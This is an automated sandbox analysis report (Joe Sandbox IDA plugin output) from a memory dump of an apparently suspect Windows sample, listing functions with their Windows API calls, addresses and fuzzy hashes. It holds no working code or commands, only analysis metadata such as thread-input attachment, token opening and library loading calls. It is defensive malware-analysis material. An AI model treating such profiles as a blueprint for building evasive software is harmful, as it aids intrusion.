Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 06f166b41080b9145c5596e4d6558c9dc5a6c43d7e4a6442a1f75465db4a1852
Instruction ID: 2b1fc3aa76bde77fc61221e6dec68ddcbd09801fb59e722b1029c1edd099df6a
Opcode Fuzzy Hash: 06f166b41080b9145c5596e4d6558c9dc5a6c43d7e4a6442a1f75465db4a1852
Instruction Fuzzy Hash: 6411E13A200202BFCB159F38C845D7ABBE9EF85350B50806AE842C72A4EF31A911D7A1

Function 00B37CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00B37D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00B37D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B37D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B1B7AD,00000000), ref: 00B37D6B

Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: b8e3cab28caeb0faee5fe75c0a0d24a67385155c9471fff964343dfdbaf09c12
Instruction ID: 71ea17539380beed1e9db98947c08abc920fc1c8f88f389844b20843318752c0
Opcode Fuzzy Hash: b8e3cab28caeb0faee5fe75c0a0d24a67385155c9471fff964343dfdbaf09c12
Instruction Fuzzy Hash: D911ACB6244654AFCB208F6CCC04AAA3BE4EF45360F218764F939D72E0DF308961DB50

Function 00B35660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00B356BB
_wcslen.LIBCMT ref: 00B356CD
_wcslen.LIBCMT ref: 00B356D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B35816

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 0c89f1b1888edc3b09b022baf76743bfbe48f49a58e9fbaebed9a68ac2945b94
Instruction ID: 240ab5193433ef508216d9cbc2ec9e1ac5a6180f434375ee881cd6d5d26bec26
Opcode Fuzzy Hash: 0c89f1b1888edc3b09b022baf76743bfbe48f49a58e9fbaebed9a68ac2945b94
Instruction Fuzzy Hash: 7911D37560061896DB30DFA5CCC6AEE77ECEF15760F7041AAF915D6181EB70DA80CB60

Function 00AD1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71bb45d9dafa77843977f8abbf2f95a0c1fdf683f8eee9fe25fc3a18d72c0c09
Instruction ID: 24732365b8b49cfa5ec34d4a23cfa5bab1c46384f676abc061a2e74cab6b9a05
Opcode Fuzzy Hash: 71bb45d9dafa77843977f8abbf2f95a0c1fdf683f8eee9fe25fc3a18d72c0c09
Instruction Fuzzy Hash: 590162B2209A167EF62126B87CC1F67766EDF917B8B340327F567613D2DB608C409270

Function 00B01A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00B01A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A8A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 62b555150a20a1b2a108d1c6cbb23530c12a8daaaecbc859c6387f03dde2066d
Instruction ID: dbe494d6e84d7763a378e6a46b7c88bf4a24b0cf4b8b5f25d9645ddea6e08d24
Opcode Fuzzy Hash: 62b555150a20a1b2a108d1c6cbb23530c12a8daaaecbc859c6387f03dde2066d
Instruction Fuzzy Hash: AE11FA3AA01219FFEB119BA9CD85FADBBB8EB04750F200491E614B7290DA716E50DB94

Function 00B0E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B0E1FD
MessageBoxW.USER32(?,?,?,?), ref: 00B0E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B0E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B0E24D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: addd8afd9413a2f4184b800a90f7a7aa88de5d3b191bab4181222c552192b7b9
Instruction ID: ef8002e9e89b4e4bffa6083bf083ed99e55d42b5020861f7123385c490180780
Opcode Fuzzy Hash: addd8afd9413a2f4184b800a90f7a7aa88de5d3b191bab4181222c552192b7b9
Instruction Fuzzy Hash: 7211A176904254BBC7019FECAC09A9E7FACEB45324F154A69F928E3291DAB0D94487A0

Function 00ACD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00ACCFF9,00000000,00000004,00000000), ref: 00ACD218
GetLastError.KERNEL32 ref: 00ACD224
__dosmaperr.LIBCMT ref: 00ACD22B
ResumeThread.KERNEL32(00000000), ref: 00ACD249

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 32145fd1844c4d15374d663edfd8ed4cea16e12c2e2593aa224a789f2af9f1c6
Instruction ID: a90bb23a25e9d30f8c8d512700d8a8a72ad39b91ca4ee613d9247db59698bd83
Opcode Fuzzy Hash: 32145fd1844c4d15374d663edfd8ed4cea16e12c2e2593aa224a789f2af9f1c6
Instruction Fuzzy Hash: 05018076805204BBDB215BA9DC09FEE7E69EF81731F22422DF925A61D0DF71C901D7A0

Function 00AA600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
GetStockObject.GDI32(00000011), ref: 00AA6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: c9b3b64f72f91e7236ca4a61495b0625baebcabf73070514a9a1e1add392e48b
Instruction ID: d749ad79949d33370d2aca1c5d72065f68ea9581c3cf43ccd612dfff49536ac9
Opcode Fuzzy Hash: c9b3b64f72f91e7236ca4a61495b0625baebcabf73070514a9a1e1add392e48b
Instruction Fuzzy Hash: 7B116D72501949BFEF124FA49C44EEABF6DEF093A5F194215FA1463150DB329CA0EFA0

Function 00AC3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00AC3B56

Part of subcall function 00AC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00AC3AD2
Part of subcall function 00AC3AA3: ___AdjustPointer.LIBCMT ref: 00AC3AED

_UnwindNestedFrames.LIBCMT ref: 00AC3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00AC3B7C
CallCatchBlock.LIBVCRUNTIME ref: 00AC3BA4

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 66a04a1d869950e0cdf5bb13ea439dbdb65293ffe8de1569a6c4a32ddb76f804
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 5901D733100149BBDF126F95CD46EEB7B6DEF58754F068018FE4866121C632E9619BA0

Function 00AD3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AA13C6,00000000,00000000,?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue), ref: 00AD30A5
GetLastError.KERNEL32(?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue,00B42290,FlsSetValue,00000000,00000364,?,00AD2E46), ref: 00AD30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue,00B42290,FlsSetValue,00000000), ref: 00AD30BF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 0d1989a52d1022e2790106119aa590c69a31e7eed13f2aaec88a12b75be1ce2e
Instruction ID: ebb143d9faea073a6fffa4f4d991eecbaf62ab193b52a03026e235580765cdf1
Opcode Fuzzy Hash: 0d1989a52d1022e2790106119aa590c69a31e7eed13f2aaec88a12b75be1ce2e
Instruction Fuzzy Hash: 0601F737701222ABCF314BB8AC44A5B7BA8AF05B61B240621F907F7340CB21D901C7E1

Function 00B07464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00B0747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B07497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B074AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B074CA

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 4618238d7980e061c8aeb0facefd4d40aec48762c772ca754d3deb53ffd40033
Instruction ID: fee56db19181c9d57f01b22fed666847d10173763b33b94b4b06ce0471f8a3e2
Opcode Fuzzy Hash: 4618238d7980e061c8aeb0facefd4d40aec48762c772ca754d3deb53ffd40033
Instruction Fuzzy Hash: 3F11A5B56453149BE7208F54EC48F9ABFFCEB00700F108599A556D7291DB70F904DB90

Function 00B0B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B126

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 1cc80e1f234cc7c9cfe67fa5ee7b6ea25a57f69d2184e5e59cc915beb6aaf8a7
Instruction ID: f333a79e0e4da3b9ce0fe2d4a771abef6f28afd7a7f2452dc5669616c44ad783
Opcode Fuzzy Hash: 1cc80e1f234cc7c9cfe67fa5ee7b6ea25a57f69d2184e5e59cc915beb6aaf8a7
Instruction Fuzzy Hash: 8C113931C01928E7CF00AFE4E998AEEBFB8FF09711F204085D941B3181CF305A609B91

Function 00B02DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B02DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B02DD6
GetCurrentThreadId.KERNEL32 ref: 00B02DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B02DE4

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 68dc53d12940f1c1605e0ad1b05a2633211429303a292c152dc33efee3e0c3e7
Instruction ID: e7d80db41cc31785d2511c15d5d85596ed4b68347d4f8a27583ecc8a06840fa5
Opcode Fuzzy Hash: 68dc53d12940f1c1605e0ad1b05a2633211429303a292c152dc33efee3e0c3e7
Instruction Fuzzy Hash: 7DE06D711016247ADB201BA29C0EEEB3EACEB42BA1F200165B506E30809AA0C844C7B0

Function 00B38863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00AB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96A2
Part of subcall function 00AB9639: BeginPath.GDI32(?), ref: 00AB96B9
Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00B38887
LineTo.GDI32(?,?,?), ref: 00B38894
EndPath.GDI32(?), ref: 00B388A4
StrokePath.GDI32(?), ref: 00B388B2

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: e9403cd43884345fa7cf2fe108de89211a87e1fd735521089e8d8a6adf1c8820
Instruction ID: 618a08b7f96d188843ed0cb4fed212e643049274d1f11a2dca1993f8878fbaf4
Opcode Fuzzy Hash: e9403cd43884345fa7cf2fe108de89211a87e1fd735521089e8d8a6adf1c8820
Instruction Fuzzy Hash: D5F03A36045698BADB125F98AC09FCE3F69AF06310F248040FB12760E2CB755552DBA5

Function 00AB98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00AB98CC
SetTextColor.GDI32(?,?), ref: 00AB98D6
SetBkMode.GDI32(?,00000001), ref: 00AB98E9
GetStockObject.GDI32(00000005), ref: 00AB98F1

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 97fac2afafd2dd5754c46cc2d314445956a7e22333ff246c14e5c8936c7a4d94
Instruction ID: a4d73356115d98faf36c557c4b6677229e9122babcbfdc2583161b6f0c5af825
Opcode Fuzzy Hash: 97fac2afafd2dd5754c46cc2d314445956a7e22333ff246c14e5c8936c7a4d94
Instruction Fuzzy Hash: 35E06531244644AADB215BB4AC09BED3F10AB11336F148219F7F5650E1C77146409B10

Function 00B0162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00B01634
OpenThreadToken.ADVAPI32(00000000,?,?,?,00B011D9), ref: 00B0163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B011D9), ref: 00B01648
OpenProcessToken.ADVAPI32(00000000,?,?,?,00B011D9), ref: 00B0164F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: bdd293fc4fa3851b9d04bb01c8f730571b7c5e644ddd9d32a82860d7e716f3f4
Instruction ID: 8f1b5bc116ccca74bf5f4f1c458487157694c60a8c38d60de56fbde9a0251a10
Opcode Fuzzy Hash: bdd293fc4fa3851b9d04bb01c8f730571b7c5e644ddd9d32a82860d7e716f3f4
Instruction Fuzzy Hash: 54E08C32602211EBD7201FE4AE0DB8B3FBCEF44792F248848F245EA080EB348444CB68

Function 00AFD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00AFD858
GetDC.USER32(00000000), ref: 00AFD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AFD882
ReleaseDC.USER32(?), ref: 00AFD8A3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f8db0f73a3b7575637ca4d37bc5aaaaf11c9d35360f38cccaed9b8c2c5ead22d
Instruction ID: 35e102deb06b1ea719f7306840f429b6aa64830a2f7a42ce7b1b2123659b4a7b
Opcode Fuzzy Hash: f8db0f73a3b7575637ca4d37bc5aaaaf11c9d35360f38cccaed9b8c2c5ead22d
Instruction Fuzzy Hash: E8E0EEB1800204EFCB41AFE09909A6DBFB6AB08310F208009F846E7260CB388901AF40

Function 00AFD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00AFD86C
GetDC.USER32(00000000), ref: 00AFD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AFD882
ReleaseDC.USER32(?), ref: 00AFD8A3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
